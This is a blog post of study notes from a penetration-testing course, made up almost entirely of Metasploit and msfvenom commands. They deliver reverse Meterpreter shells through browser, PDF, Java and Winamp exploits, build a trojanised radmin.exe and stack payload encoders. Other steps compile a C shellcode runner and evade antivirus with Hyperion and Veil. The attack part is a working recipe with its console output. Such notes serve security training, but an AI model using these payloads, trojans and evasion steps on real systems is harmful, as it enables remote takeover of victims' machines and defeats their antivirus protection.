Advanced Exploitation

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary

(1) Client Side Exploits

Browser Attacks
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
SRVHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH aurora
URIPATH => aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.9:4444
[*] Using URL: http://192.168.20.9:80/aurora

(2) Automatically Migrating
msf exploit(ms10_002_aurora) > set PrependMigrate true

(3) PDF Exploits
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > exploit
[*] Creating ‘msf.pdf’ file…
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
[*] exec: cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf) > service apache2 start
[*] exec service apache2 start
Starting web server: apache2.
msf exploit(adobe_utilprintf) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.20.9:4444

(4) PDF Embedded Executable
msf > use exploit/windows/fileformat/adobe_pdf_embedde d_exe
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /usr/share/set/readme/User_Manual.pdf msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.20.9
msf exploit(adobe_pdf_embedded_exe) > exploit

(5) ​Java Exploits
msf > use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean) > set SRVHOST 192.168.20.9
msf exploit(java_jre17_jmxbean) > set SRVPORT 80
msf exploit(java_jre17_jmxbean) > set URIPATH javaexploit
msf exploit(java_jre17_jmxbean) > show payloads
msf exploit(java_jre17_jmxbean) > set payload java/meterpreter/reverse_http

(6) Java Applets​
msf exploit(java_jre17_jmxbean) > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > set APPLETNAME [APPNAME]
msf exploit(java_signed_applet) > set SRVHOST 192.168.20.9
msf exploit(java_signed_applet) > set SRVPORT 80

(7) Browser Autopwn​
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.20.9 LHOST => 192.168.20.9
msf auxiliary(browser_autopwn) > set URIPATH autopwn URIPATH => autopwn
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] — Done, found 16 exploit modules
[*] Using URL: http://0.0.0.0:8080/autopwn
[*] Local IP: http://192.168.20.9:8080/autopwn
[*] Server started.

(8) Winamp Skin Example​
msf > use exploit/windows/fileformat/winamp_maki_bof
msf exploit(winamp_maki_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(winamp_maki_bof) > set LHOST 192.168.20.9
msf exploit(winamp_maki_bof) > exploit

Social Engineering​
setoolkit

Trojans
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windowsbinaries/radmin.exe -k -f exe > radmin.exe

-x executable template
-k run the shellcode in a new thread

Metasploit Encoding​
We can also run our shellcode through an encoder to obfuscate it.

msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe

Multi-Encoding​
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw> meterpreterencoded.bin
msfvenom -p -f exe -a x86 –platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin

Combining Techniques​
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe

Custom Compiling
#include unsigned char
random[]=
unsigned char shellcode[]=

int main(void) {
     ((void (*)())shellcode)();
}

Creating Shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f c -e x86/shikata_ga_nai -i 5

Creating Randomness: 
cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512

Compiling:
i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c

Hyperion
Encrypts with AES encryption and throws away the key.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f exe > meterpreter.exe

cd Hyperion-1.0/
wine ../hyperion ../meterpreter.exe bypassavhyperion.exe

Veil
Framework for using different techniques to bypass antivirus

cd Veil-Evasion-master
./Veil-Evasion.py ​

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s